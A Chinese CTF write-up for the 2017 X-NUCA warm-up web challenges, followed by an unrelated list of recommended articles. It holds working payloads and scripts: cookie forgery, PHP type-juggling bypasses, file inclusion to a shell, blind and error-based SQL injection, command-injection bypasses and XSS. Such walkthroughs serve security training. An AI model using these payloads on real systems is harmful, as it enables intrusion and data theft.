捉迷藏
题目url:http://218.76.35.75:20111/index.php
进去之后查看源码:
发现有隐藏链接:Index.php (Linux中对url大小写敏感) 手动输入后发现被跳转回来 于是在命令行使用curl工具逃逸跳转(curl默认不跟随跳转)
Payload: curl http://218.76.35.75:20111/Index.php
简单的问答
题目url:http://218.76.35.75:20112 进去之后查看源代码发现题目全是扯淡 源码截图如下:
分析form后提交post(工具:HackBar) PS:后台估计是没有处理q4字段,直接处理q3字段了
Payload: url -> http://218.76.35.75:20112
Post Field -> q1=2016&q2=lol&q3=22&success=true
后台后台后台
题目url:http://218.76.35.75:20113/ 进去之后只有一个Enter按钮可被操作, 目的是获得admin权限 观察到Response有新Cookie被set,
Member疑似Base64,Decode后发现是Normal,猜测这是基于Cookie的Auth,直接在浏览器控制台修改Cookie后点击Enter后获得Flag。
Payload: document.cookie="User=admin"
document.cookie="Member=QWRtaW4="
<--这是Admin字符串的base64 Encode
PHP是最好的语言
题目url:http://218.76.35.75:20114 进去看到源码,白盒审计 代码如下:
2016)?$v1=1:NULL;
//此v必须大于2016,这里用到了PHP的一个弱类型特点,在PHP中,当'2017aaaaabbbb' 与数字2016比较时,PHP会尝试把前者转换成数字,故前者会被转换成2017,这与(int)'2017asdadasd' = 2017是符合的,看下面[图1]
}
if(is_array(@$a["bar2"])){ //foo中必须含有一个k为bar2,v为数组的kv对
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
//bar2的v中的数组元素必须等于5个,并且第一个元素必须还是为数组
$pos = array_search("nudt", $a["a2"]);
$pos===false?die("nope"):NULL;
//foo中必须包含一个k为a2,v为nudt的kv对(我觉得出题人这里是想出成bar2中必须包含一个v为nudt的kv对)
foreach($a["bar2"] as $key=>$val){
$val==="nudt"?die("nope"):NULL;
//bar2里面的元素不允许包含nudt字符串
}
$v2=1;
}
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
//这里利用了eregi会被%00截断的特点构造payload绕过检测
}
}
if($v1 && $v2 && $v3){
include "flag.php";
echo $flag;
}
?>
Payload:http://218.76.35.75:20114/?foo={"bar1":"2017Pr0ph3t","bar2":[[""],"","","",""],"a2":["fuck","nudt"]}&cat[0]=%00�htctf2016&cat[1][]=1&dog=222
Login
题目url:http://218.76.35.75:20115/ 进去之后随便点点观察到Url为?page=xxx,很有可能是文件包含,直接试一波php伪协议, php://filter/convert.base64-encode/resource=main
发现可以,遂读取页面源码 ----------- index.php ----------
----------- main.php ----------
trolol
main
server info
login
----------- login.php ------------
login
这一题比较迷。。因为题目逻辑貌似是直接随便包含一个log文件就能出flag。。 基本思路是,登陆带debug生成log然后在index.php里发log的参数。。 但是其实这一题估计是出题人改崩了。。。 王师傅有更6的解题思路。。。(我觉得这应该是正确的)。。 详情请移步http://www.jianshu.com/p/fd9f38753078
简单的文件上传
题目url:http://218.76.35.75:20122 中规中矩的上传检测,后台检测后缀和MIME类型,要求是php后缀并且MIME是jpg,直接F12截包修改MIME得到flag
简单的JS
题目url:http://218.76.35.75:20123 打开页面有提示The evil url is the passkey
,查看源码有
在控制台解码后为
访问http://218.76.35.75:20123/fl0a.php
后查看cookie得到flag
PHP是一门松散的语言
简单的文件包含
题目url:http://218.76.35.75:20126 题目描述是:flag在/flag里 打开页面随便点开一个page发现url疑似包含,伪协议不能用,所以根据题目描述把参数改成?page=/flag后在源码中可以得到下一个文件的名字,访问那个文件得到flag
简单的验证
题目url:http://218.76.35.75:20127 根据题目描述得知我们要变成admin才有权限看flag 页面并没有啥有用信息,查看cookie得到user和guess,看来又是一题基于cookie的Auth,因为是guess,所以可以猜到是爆破,直接上脚本:
#coding:utf8
import requests
se = requests.Session()
# -------- 简单的验证
for x in xrange(0,1000):
res = se.get('http://218.76.35.75:20127/index.php',cookies={'user':'admin','guess':'%d' % x})
print '[*] Trying ' + str(x)
if 'not' not in res.content:
print '[*] The guess num is ' + str(x)
print '[*] Content----------'
print res.content
exit()
GG
题目url:http://218.76.35.75:65380/ 进去以后是一个俄罗斯方块(我还玩了一下233333) 玩的过程中并没有在请求里面发现于后台的交互,这是前端题? 查看美化后的JS,发现有个地方比较奇怪
这里貌似是明示了一个js文件,名字是e100.js 访问一下发现是久违的jsFuck,直接丢进控制台就alert出flag了
Reappear
题目url:http://218.76.35.75:65180/ 进去以后发现是kindeditor,访问有文件遍历漏洞的php发现能用,看到attached文件夹下有flag_clue.php,访问之后发现疑似倒着的base64,python切片走一波,得到结果再base64解码后出flag
Payload:http://218.76.35.75:65180/kindeditor/php/file_manager_json.php?path=/
DrinkCoffee
题目url:http://218.76.35.75:65280/ 进去以后有Hint: Find the password to submit, but you should come from http://www.iie.ac.cn and your IP must be 10.10.20.1
并在Response header发现有password 那很清晰就是修改http header了,这里推荐一个火狐的插件叫:Modify Header 修改Referer为http://www.iie.ac.cn,X-Forward-for为10.10.20.1 ,然后把password拿到md5解密网站查找一下,找到密码为cafe,直接post上去即可拿到flag
Default
题目url:http://218.76.35.74:20131 进去以后啥都没有,根据提示开扫描器直接骚(立个flag,自己写一个扫描器) 骚到index2.php 访问之后发现有源码,是一个代码注入
直接上Payload
Payload:http://218.76.35.74:20131/index2.php?hello=);show_source('flag2.php'
Vote
题目url:http://218.76.35.75:65080/ 进去以后顺手扫一波,这里推荐一下自家的扫描器,介绍在下一篇文章 扫出备份文件, .index.php.swp后下载查看源码(不知道为什么这里vim -r无法修复文件,所以直接hexdump -C把能读的弄了出来,再用python切片倒叙一下再整理一下逻辑就有了大概的源码了。
#coding:utf8
raw = '''echo 'goBack ';
echo '';
echo ''.$arr[0].' '.round($arr[1], 2).' ';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo ''.$arr[0].' ';
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
while ($r = mysql_fetch_array($q)) {
echo 'Logo Total votes Average ';
echo '';
echo 'Thank you! Results:
';
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
$vote = 1;
if ($vote > 5 || $vote < 1) $vote = (int) $_POST['vote'];
$id = $_POST['id'];
die('please select ...');
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id'])) if (isset($_POST['submit'])) {
$login = $_SESSION['login'];
}
$_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
if (!isset($_SESSION['login'])) {
session_start();
include 'db.php'; < ?'''
arr = raw.split('\n')
print '\n'.join(arr[::-1])
得出大概的源码
include 'db.php';
session_start();
if (!isset($_SESSION['login'])) {
$_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
}
$login = $_SESSION['login'];
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id'])) if (isset($_POST['submit'])) {
die('please select ...');
}
$id = $_POST['id'];
if ($vote > 5 || $vote < 1) $vote = (int) $_POST['vote'];
$vote = 1;
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
echo 'Thank you! Results:
';
echo '';
echo 'Logo Total votes Average ';
while ($r = mysql_fetch_array($q)) {
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
echo ''.$arr[0].' ';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo ''.$arr[0].' '.round($arr[1], 2).' ';
}
echo '
';
echo 'goBack ';
可以审计代码发现疑似是二次注入,利用的是id字段,这里有个小技巧就是利用hex来绕过is_numeric的检测 经过测试是没问题的,但是猜测可能id字段长度有限。。。。所以去information_schema.tables里面注入不了东西 被截断了 然后只能猜表名了。。。 最后猜到是t_flag表 字段为flag
最后吐槽一下这题提示有点少。。。。。
Document
题目url:http://218.76.35.74:20129 进去之后查看源码发现有inlude.php提示 进去include.php查看源码发现此文件有file参数和有upload.php的提升 猜测这个文件是用来文件包含的,进去upload.php发现是个上传,那问题很清晰了, upload.php上传shell-->include.php包含执行命令的文件-->getshell
然后测试include.php发现php伪协议是可以用的 读取源码 upload.php
include.php
Tips: the parameter is file! :)
=70)
{
echo " error!
";
}
else
{
include($file.'.php');
}
}
?>
发现并没有过滤zip或者phar协议 可以选择上传压缩包并用伪协议解压
最后getshell payload如下: url+?file=zip://upload/shell.jpg%23shell&pp=(命令写这)
这题有点坑的是不知道是谁写了个假flag在upload里面。。大家改得不亦悦乎23333333 我以为flag已经被改掉了
结果最后还是自己太菜了。。。 命令上find / | grep flag 能在/etc/.sshkey/flag.txt下找到flag 23333还是挺好玩的
阳光总在风雨后
题目url:http://218.76.35.74:20130 进去以后是个简单的登陆界面,扫一扫发现有admin目录(再次打广告 我刚刚撸的一个扫描器不错 在下一篇文章有介绍)然后就猜测是要注入登陆进去,日常输入admin、admin后发现提示密码错误,那就很明显是一个盲注了,然后这题还过滤了很多字符
如:and、or、|、空格、union、information、..... 这题有点坑。。过滤了information....也就是说表名要自己猜。。 最后猜到是admin 直接上脚本
#coding:utf8
import requests
se = requests.Session()
payload = '1\'%%(ascii(mid((select(group_concat(passwd))from(admin))from(%d)))=%d)%%\'1'
passwd = ''
for x in xrange(1,34):
for y in xrange(33,127):
res = se.post('http://218.76.35.74:20130/login.php',data={'uname':payload % (x,y), 'passwd' : 'fuck'})
if 'password error!!' in res.content:
print chr(y)
passwd += chr(y)
break
else:
print payload % (x,y)
print '[*] passwd = ' + passwd
print '[*] passwd = ' + passwd
跑出来密码是: 50f87a3a3ad48e26a5d9058418fb78b5
去cmd5碰撞
拿admin、shuangshuang登陆进去之后是一个命令执行的界面
ls一下发现只有index.php ls ../admin发现没有结果 猜测是把空格过滤了,试试系统变量${IFS}可以绕过,然后尝试读取上一级目录发现只有login.php回显,不对劲,因为上一级目录是肯定存在index.php的,这里猜测是后台只截取了最后一行的输出,那这里可以使用head命令输出第一行 命令执行绕过http://blog.csdn.net/qq_27446553/article/details/73927518
这里偷个懒直接写脚本了。。
#coding:utf8
import requests
import re
se = requests.Session()
cookie = {'PHPSESSID' : '5cpbv7knav0mfshnmn5a2u3ku4'}
url = 'http://218.76.35.74:20130/admin/index.php'
for x in xrange(1,30):
payload = r'find${IFS}/${IFS}|grep${IFS}flag|head${IFS}-n${IFS}' + str(x)
res = se.post(url,cookies=cookie,data={'ord' : payload})
feedback = re.findall(r'.*
(.*)命令执行完成!.*',res.content, re.M|re.S)
print feedback[0].strip()
这个有点可疑 cat之后出flag
试试XSS
题目url:http://218.76.35.75:20125 这题很粗暴,直接XSS 不多说直接上poc
这题要吐槽的是下面的payload不行。。。??why???
' onerror='alert(document.domain)'
http头注入
题目url:http://218.76.35.75:20121 进去之后又提示,修改http头,点击link进入之后Fuzz出Referer存在注入,估计是insert的注入,一般来说是基于时间的盲注和报错注入,这里我选择比较简单快捷的报错注入,具体payload估计已经烂大街了,如下:
http://1' || 1=(updatexml(1,concat(0x3a,(查询语句)),1)) || '
结果如下: 库名:http://1' and 1=(updatexml(1,concat(0x3a,(select database())),1)) and '
ctfweb20110 表名:http://1' and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema = 'ctfweb20110')),1)) and '
flag,visits 字段名:http://1' and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name = 'flag')),1)) and '
id,flag 查flag:http://1' and 1=(updatexml(1,concat(0x3a,(select flag from flag)),1)) and '
最安全的笔记管理系统
题目url:http://218.76.35.74:20128
...... 待更新
你可能感兴趣的:([2017X-nuca] 赛前热身Writeup)
德国出局 韩国创历史 态度决定结果从来不是一句空话
谷月苍松
1俄罗斯世界杯小组赛进入尾声,F组爆出了最大冷门,卫冕冠军德国队以0:2不敌赛前公认小组最弱对手韩国队,垫底出局。即使是最稳定的德国队也终究没能逃脱卫冕冠军魔咒,自1954年设立小组赛以来,日耳曼战车第一次未能小组出线。早在抽签结果出炉之际,德国队就与巴西队公认为本届比赛的最大夺冠热门。看看这批德国队的阵容,阵容囊括上届世界杯夺冠功勋教练、功勋球员,再加上诸如罗伊斯这样的大牌球星。然而,就是这样超
要重赛吗?G2击败不可一世的T1,兑现赛前狠话,拿下对抗赛开门红
游戏酱park
★游戏酱park原创5月20日,在MSI季中邀请赛六强对抗赛揭幕战中,来自欧美LEC赛区的G2战胜本土作战的LCK十冠王T1,拿下对抗赛开门红。赛后,G2战胜T1也瞬间冲上了热搜排行榜。这场比赛T1梦幻开局却惨被逆转,问题就出在中期一波T1莽撞rush大龙。G2众将及时赶来,由上单奥恩开启团战,配合Caps亚索切割T1后排阵型,小吕布Gumayusi和Oner毫无输出环境,击杀三位T1队员后,G2
雨中晨跑
林中的空气
出门时天气阴沉,像往常一样就开始了慢跑热身(这是本人跑步的一个习惯),调整呼吸,调整步子,调整摆臂,慢慢进入一个舒适的状态,同时也就开启了美好的晨跑中…跑了20分钟左右,天空开始有雨点落下,起初不经意间打到脸上,还是有点惊讶,想要不要赶快回去,伴随回去的想法,加快了跑步的节奏,雨点调皮地调整着落点,一会儿打到脸上,一会儿落到肩上,手上也时不时给来几下,被迫感受着雨点的调皮,居然有点兴奋。雨还在下,
11月30日 NBA常规赛 骑士vs独行侠比赛前瞻分析
好球体育
对阵双方:骑士vs独行侠联赛类型:NBA常规赛比赛时间:2021-11-3009:30:00星期二比赛地址:好球体育双方基本面分析:骑士:1.骑士上一场大胜魔术终结了自己的五连败,目前球队10胜10负排在东部的第10名。2.今年骑士开局打的不错,但不幸的是球队在前段时间遇到到了伤病的侵袭。3.目前球队的首发后卫塞克斯顿已经确定赛季报销,之前莫布利、阿伦以及马尔卡宁、奥斯曼都缺席过比赛,不过好在现在
9.4足球分析:英超曼彻斯特联 VS 阿森纳
北梦说球
曼彻斯特联:曼彻斯特联在经历了糟糕开局以后,球队非常迅速地调整好了自己的状态。不得不说,豪门球队毕竟是豪门球队。目前,他们已经取得了三连胜,重新找回了自己的状态。虽然还没有回到联赛前三的位置,但相信要不了多久他们就能够完成自己的任务。而在近日,热刺队爆冷被逼平,使得如今球队拥有了追赶的动力。阿森纳:在过去的连续十一场比赛中,球队都取得了比赛胜利。目前,谁能够终结球队连胜成为了大家常常讨论的话题。开
Day 1439:冬训
kafkaliu
4℃阴PM2.528浦东今天早上要接待客户,又是LSD,所以闹钟定得比较早。课表编排有些不太适合我,周一是比较忙的,有周会,而且周日刚LSD。昨天在成都跑了不一样的路线,今天在上海也跑了不一样的路线,跑了一个拐尾巴的“甲”。人少车少。整体还比较轻松。腿部肌肉多少还是有些紧张,冬天要充分热身。冬训正式训练的第15天。
总结
福雨的梦
今天的课程,游戏热身很能够提高学生们的兴趣,我个人的游戏储量不够!要多利用有用的装备多种形式展开!自己多去查阅哈游戏方式!再就是在教学过程中,自己在前面带领的时候!同学们模仿学习,他们有的会不那么认真,下一次课再有这样的情况我可以选择在旁边或者队伍中间带领!让娃娃感觉到紧迫感,在他们旁边示范跟进动作!也能够及时的进行纠错!让他们对动作有更大的帮助!哪里问题直接就说明,这比他们模仿学习更有效果!对于
Dharma Yoga️️1⃣️3⃣️课堂印象
DharmaYoga麗子
昨天记得是王剑老师先带我们完成了脉动主题的练习,汗水成片的流淌,我知道这种流汗的方式跟非常不同的,可以说是冷静地流下来,你还不会感到燥热。过程中我专注去感受这个脉动是哪部分的趋势引导的,因为记得前面王霞她们小组有这个脉动热身的编排由小琴示范,我做起来大腿酸的有些惊讶,因为很久很久我的练习大腿前侧极少启动,一酸就不满意了,这不是我要的效果,现在有王老师带领,看见老师的状态做起来很轻盈,于是迅速调整分
健康最重要
Lexi人生是一场修行
我身边有个朋友,因为想追一个女生,所以开始健身,然后一直到现在坚持成为一个良好的习惯。那时候的他至少有167斤,然后以前一开始的时候跑一个小时,然后做拉伸动作,现在有腹肌跟胸肌了就为了不流失肌肉,只是做热身跑步半个小时,然后练卷腹跟肌肉维持半个小时,一共一个小时左右,怎么说呢,还是找到适合自己的一套健身方式才好!每天100个俯卧撑,然后仰卧起坐30个,俯身伸腿30个,其实前期先是脱脂,然后第二步是
中国女足真的能够爆冷击败英格兰女足吗?
漫漫长路行
不查不知道,一查就被吓了一大跳。2023年女足世界杯小组赛D组四支球队的最新世界排名从高到低依次是英格兰女足、丹麦女足、中国女足与海地女足,海地女足被认为是同小组实力最弱的球队,但她们在与强大的英格兰女足较量中,硬是凭借强悍的防守能力,让英格兰女足只进了1粒球,这个比赛结果还是有点超出球迷粉丝的意料之外;赛前大家普遍认为英格兰女足至少能攻进2-3个球,但事实上并没有发生这种理想的情况;这不免使得我
看半部《论语》如何治天下(17)?
羊仔羊
子曰:“君子无所争,必也射乎!揖让而升,下而饮。其争也君子。”①射:射箭。这里指射箭比赛,是古代的一种礼仪。②揖(yi)让而升:揖,拱手作揖,古代的一种礼节。揖让而升是说在登堂比赛前先相互作揖表示谦让,然后才登堂比赛。③下而饮:比赛完后下堂饮酒互相祝贺。这些礼仪我中华古已有之,只不过现代人丢了,还以为近邻才有礼,可惜。孔子说:“君子没有什么可争斗的事情。如果一定要说有,那也就像射箭比赛一样吧!登堂
我的健身日记第6天
江南陈墨
5.21练腿热身椭圆机10分钟拉伸空杆深蹲20抗阻力训练1.杠铃深蹲50公斤40个(四组)2.哈克深蹲80公斤48个(四组)2.5组间俯卧撑一组,共四组,每组15个3.腿举80公斤48个(四组)3.5组间俯卧撑一组,共四组,每组15个4.器械腿屈伸30公斤80个(四组)后记现在开始有意识把抗阻力训练中增加循环训练内容,以HIIT,tabata方式为主。音乐会今天去海心沙亚运馆参加星巢秘境音乐会,来
《重生后,打脸渣男贱女》张晚苏岩苏蔓蔓π_π都市言情小说π_π《重生后,打脸渣男贱女》完结篇!
妞妞爱读书1
上一世,我苦心创作出来的作品却被人举报抄袭。大量的证据公布出来,网上直接骂疯。解释无效,网暴升级为人身攻击,极端网友往我家丢燃烧酒瓶。父母在火灾中丧命,我因此患上抑郁症。到了最后,我割开手腕,死在冰冷的浴缸里。再睁眼,我居然又回到了比赛前一周。再睁眼的时候,我重生了。「这次比赛,肯定又是你拿第一!」耳边传来熟悉的声音,我猛的睁开眼睛。这句我太熟了,永生都不会忘记。太自信不是一件好事,就像前世的我一
12月14日 NBA常规赛 太阳vs快船比赛前瞻分析
好球体育
联赛类型:NBA常规赛对阵双方:太阳vs快船比赛时间:2021-12-1411:30:00星期二双方基本面分析:好球体育太阳:1、菲尼克斯太阳此前一度接近拿下20连胜,在此前连胜终结之后,近期取得两连胜状态回暖。2、菲尼克斯太阳在最近的6场比赛五场打出小比分,近期已经连续三场打出小比分。3、菲尼克斯太阳在客场进攻端场均得分接近主场,但是客场场均失分要高出主场近5分。4、除了两名锋线卡明斯基和沙里奇
2021年2月18日学习复盘——培养阅读习惯的关键
幽韵离殇
阅读要具有目的性,只有有计划,有目的的阅读才能提高阅读效率。阅读的目的是启发或者解决问题,盲目的阅读或者根据别人的书单来阅读都是不可取的。阅读前的“热身运动”必不可少,预习是一种热身,主要目的是为了新旧知识之间连接的建立。孤立的知识点是不容易被记忆的,只有与旧知识产生连接,新的知识才容易记忆和消化。课堂是向老师提问和解决问题的关键,而预热之后的阅读就要带着问题去读,如果书里的答案不够明了或者让我们
第五章 枯燥的阶段
后知后jue的我
因为家里离训练场比较近,小枫早早来到训练场。身体上的每一块肌肉都酸痛,小枫乖乖的坐在场边,不敢乱动,稍微动一下身上的肌肉都让他后悔。“集合!”突然一声哨响,是老陈让大家集合,不到3秒,所有队员都迅速来到老陈面前,跟往常一样,老陈指挥大家做完热身之后,布置今天的训练任务。“小枫,你过来。”老陈向小枫挥挥手示意他到自己的跟前了。小枫有点不祥的预感,但还是快速跑动老陈面前。“小枫,你还记得你昨天练习了什
今天。
砥砺_b109
图片发自App图片发自App图片发自App赶着小雨回到家。最近我重要任务是减肥!减肥!已经习惯早上跑三十分钟热身,十分钟拉伸,二十分钟部位瘦身....今天赶鸭子的感觉,换了好几件演出服,配合摄影,重复重复来过几遍,终于拍完了。领导又说请我们吃火锅,但我们看时间太晚统统拒绝回家好好休息。早上的爷开心上班,后来成了加班狗,到家已累瘫。
2020年3月9日复盘
金婵陪你成长
一、演讲演讲训练营已经进行到第四阶段了,这可阶段的主题是即兴演讲,感觉难度开始加大了,不像前几天只要刻意练习就能做好,即兴演讲要想做好,必须要有知识储备再加上刻意练习!所以从今天开始要养成随时随地储备素材!在看别人演讲的过程中要学会思考,这个演讲的主题是什么?别人是如何就主题展开的?如果是我我会怎么去构思和组织语言呢?冲着冠军去的,结果儿子突然抢镜,下次比赛前安排好所有的事情,为冠军而战!二、阅读
跑步注意事项
易水寒1213
一、为什么跑步时某些部位会特别酸胀当然,跑姿不合理,动作协调是导致跑步时身体局部特别酸胀的主要原因之一,由于跑姿的问题,使得某些肌肉可能负担过重,肌肉用力过多而放松不足,进而引起乳酸堆积。2解决方法:纠正不合理的跑姿,跑前做好热身。肌肉力量薄弱身体是非常神奇的,有很强大的自我修复能力,同时也有非常精准的报警机制。当身体某部位酸胀时,这就是身体的报警机制,提醒你要加强这个部位的训练;当你加强训练后,
12月30日 NBA常规赛 快船vs凯尔特人比赛前瞻分析
好球体育
联赛类型:NBA常规赛对阵双方:快船vs凯尔特人比赛时间:2021-12-3008:30:00星期四双方基本面分析:好球体育【转换英文字母去浏览器即可】快船:1、快船目前成绩17胜17负排在西部第6,球队战绩不错。2、洛杉矶快船上一场以108-124惨败给布鲁克林篮网,球队的表现不佳。3、洛杉矶快船最近6场比赛输了5场,球队近期的状态糟糕。4、洛杉矶快船本赛季场均得分只有105.4分,球队的进攻能
2019-03-31 骄兵必败
棉花草
今天上午,我们一行人(10个新教师)去了村委参加游戏活动,比赛赢了是有丰厚大奖的,而其他参赛的队伍除了我们是较年轻的,其余的队伍几乎平均年龄大多在40+。游戏共有6轮,刚开始,我们仗着年轻,又因为赛前演练过一下游戏,前两轮的名次都获得了第一,取得了一点儿好成绩后,我们开始沾沾自喜,觉得第一非我们莫属,我们胜在年轻活力。没想到从第三轮游戏开始,我们便节节败退,排在第一的会得10分,而排在第十的我们只
【CTF】青少年CTF擂台挑战赛 2024 #Round 1 部分WriteUp_青少年ctf训练平台 追光者(1)
给大家的福利零基础入门对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:因篇幅有限,仅展示部分资料网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很
2019-05-07 fartlek跑
areece
早上起床,不看手机,同样的磨蹭法,居然能够早十来分钟出门,这就是手机的力量。10分钟的热身,fartle跑,1分钟on,1分钟off。计划30组,实际20组,而且中间还休息了好几次,倒不是累,依旧是懒罢了,后面觉得右边大腿有些吃力,提早结束,避免受伤。人生真是不经想。人活着是为了什么?这玩意简直是不能够想,更加不能够想的是,我自己活着是为了什么,随便想想都能够走火入魔生无可恋啊。
中国男篮首战大败,张镇麟21+5爆发,五人未获出场机会
体娱荒原
中国男篮在欧洲开始了首场热身赛,令人遗憾的是久疏战阵的中国队以64比82输给了克罗地亚。这场比赛中国队的中投命中率低至18%,三分球也只有25%,中远投的低效导致了得分低效以及比赛的失利。本场比赛有13人获得出场机会,其中五人枯坐替补席没有出场,包括备受信任的赵继伟和周琦,还有新人程帅澎、曾凡博,老将周鹏,可能是由于身体状态的原因没有出场,特别是周琦正在寻找比赛状态。虽然是一场大败,也有表现出色的
11月28日 NBA常规赛 尼克斯vs老鹰比赛前瞻分析
好球体育
对阵双方:尼克斯vs老鹰联赛类型:NBA常规赛比赛时间:2021-11-2808:30:00星期日双方基本面分析:尼克斯:有利情报1.兰德尔赛季场均可以得到19.8分10.1篮板5.1助攻,巴雷特场均14.5分,富尼耶场均12.7分,罗斯场均12分,肯巴-沃克场均11.7分,伯克斯场均9.8分,奎克利场均9.3分。免费高清地址:www.haoqiutiyu.com2.两队在上赛季中共交手8次,其中
2018第7天
池浅笑安然
2018第7天打卡图片发自App今天是周一,跑步十分热身瑜伽课一小时,体验了蛇伸展,下犬式,猫伸展……腿部器械五组臂部器械三组出汗,小黑喝水三杯打完收工
亲子日记第415天
五年六班陈乐奇
2019.5.13星期一天气晴早上宝爸送大宝上学了。我和小宝吃完饭,把该洗的衣服泡上,打扫卫生。和小宝玩了会积木,出去到公园玩去。我们先走了几圈,热热身。看到有种花开的好美像蝴蝶,就不由自主的给小宝拍了几张照片。小宝给我也拍了两张还不错呢!又去看孝亲二十四孝石像。我给小宝讲他们的故事,他听的似懂非懂。该回家做饭了小宝还没玩够,意犹未尽。我说改天我们再来。才哄着上了车子。晚上大宝做完作业有点晚,我明
穿越战争故事《2029,世界公敌》第十七章 秘鲁的毒枭(四)
续事创意写作工作室
【目录】穿越战争故事《2029,世界公敌》空中星光灿烂,山下万家灯火。吃过晚饭,李昇约着肯普一同向健身房走去,这是梅尔森为自己设置健身房,也刚好方便了李昇他们训练。肯普系好鞋带,看了看自己的运动鞋。“他们这鞋还挺合脚。”李昇也穿好了衣服:“走吧。”走出换衣间,偌大的健身房里空无一人,两人走向跑步机热身。“总部联系上了吗?”“没有,但有些发现。”“据我分析咱们的手环皮下植入的应该是一个GPS的信号发
大一新生第一次参加蓝桥杯(C/C++组),只学C够吗?怎么备赛?个人经验分享
老虎0627
蓝桥杯
个人感受(唠叨唠叨)我是2023级的物联网工程专业的一名大一新生,在大一的下半学期有幸通过校赛,参加了第十五届蓝桥杯软件赛,其实我自己都没想到大一就能参加蓝桥杯,因为当时只会C语言,也很迷茫,到底该怎么备赛?剩的时间比较少到底要不要学习C++。到底要不要学C++?我在蓝桥杯正式比赛前特别纠结要不要学c++,因为当时省的时间比较少,而且会有担心学c++的一些语法会不会把它跟c语言搞混,到时候在考场忘
基于STM32C8T6的智能小车
陌沫不是momo
stm32 arm开发 单片机
有幸赶上了今年的电赛,赛前用了一周多的时间准备迷宫小车赛题,苦于摄像头刚刚入门并不能实际应用,只能用红外传感器做出个半成品。制作小车的硬件清单:(1)小车框架小车底层版*1、顶层版*1、面包板*2、、车轮*2、万向轮*1(2)小车设备STM32C8t6核心板*1、TB6612电机驱动*1、0.96OLED、JDY-31蓝牙模块、TCRT5000红外摄像头*6、电池、电机(带编码器)*2一、小车框架
log4j对象改变日志级别
3213213333332132
java log4j level log4j对象名称 日志级别
log4j对象改变日志级别可批量的改变所有级别,或是根据条件改变日志级别。
log4j配置文件:
log4j.rootLogger=ERROR,FILE,CONSOLE,EXECPTION
#log4j.appender.FILE=org.apache.log4j.RollingFileAppender
log4j.appender.FILE=org.apache.l
elk+redis 搭建nginx日志分析平台
ronin47
elasticsearch kibana logstash
elk+redis 搭建nginx日志分析平台
logstash,elasticsearch,kibana 怎么进行nginx的日志分析呢?首先,架构方面,nginx是有日志文件的,它的每个请求的状态等都有日志文件进行记录。其次,需要有个队 列,redis的l
Yii2设置时区
dcj3sjt126com
PHP timezone yii2
时区这东西,在开发的时候,你说重要吧,也还好,毕竟没它也能正常运行,你说不重要吧,那就纠结了。特别是linux系统,都TMD差上几小时,你能不痛苦吗?win还好一点。有一些常规方法,是大家目前都在采用的1、php.ini中的设置,这个就不谈了,2、程序中公用文件里设置,date_default_timezone_set一下时区3、或者。。。自己写时间处理函数,在遇到时间的时候,用这个函数处理(比较
js实现前台动态添加文本框,后台获取文本框内容
171815164
文本框
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
持续集成工具
g21121
持续集成
持续集成是什么?我们为什么需要持续集成?持续集成带来的好处是什么?什么样的项目需要持续集成?... 持续集成(Continuous integration ,简称CI),所谓集成可以理解为将互相依赖的工程或模块合并成一个能单独运行
数据结构哈希表(hash)总结
永夜-极光
数据结构
1.什么是hash
来源于百度百科:
Hash,一般翻译做“散列”,也有直接音译为“哈希”的,就是把任意长度的输入,通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,所以不可能从散列值来唯一的确定输入值。简单的说就是一种将任意长度的消息压缩到某一固定长度的消息摘要的函数。
乱七八糟
程序员是怎么炼成的
eclipse中的jvm字节码查看插件地址:
http://andrei.gmxhome.de/eclipse/
安装该地址的outline 插件 后重启,打开window下的view下的bytecode视图
http://andrei.gmxhome.de/eclipse/
jvm博客:
http://yunshen0909.iteye.com/blog/2
职场人伤害了“上司” 怎样弥补
aijuans
职场
由于工作中的失误,或者平时不注意自己的言行“伤害”、“得罪”了自己的上司,怎么办呢?
在职业生涯中这种问题尽量不要发生。下面提供了一些解决问题的建议:
一、利用一些轻松的场合表示对他的尊重
即使是开明的上司也很注重自己的权威,都希望得到下属的尊重,所以当你与上司冲突后,最好让不愉快成为过去,你不妨在一些轻松的场合,比如会餐、联谊活动等,向上司问个好,敬下酒,表示你对对方的尊重,
深入浅出url编码
antonyup_2006
应用服务器 浏览器 servlet weblogic IE
出处:http://blog.csdn.net/yzhz 杨争
http://blog.csdn.net/yzhz/archive/2007/07/03/1676796.aspx
一、问题:
编码问题是JAVA初学者在web开发过程中经常会遇到问题,网上也有大量相关的
建表后创建表的约束关系和增加表的字段
百合不是茶
标的约束关系 增加表的字段
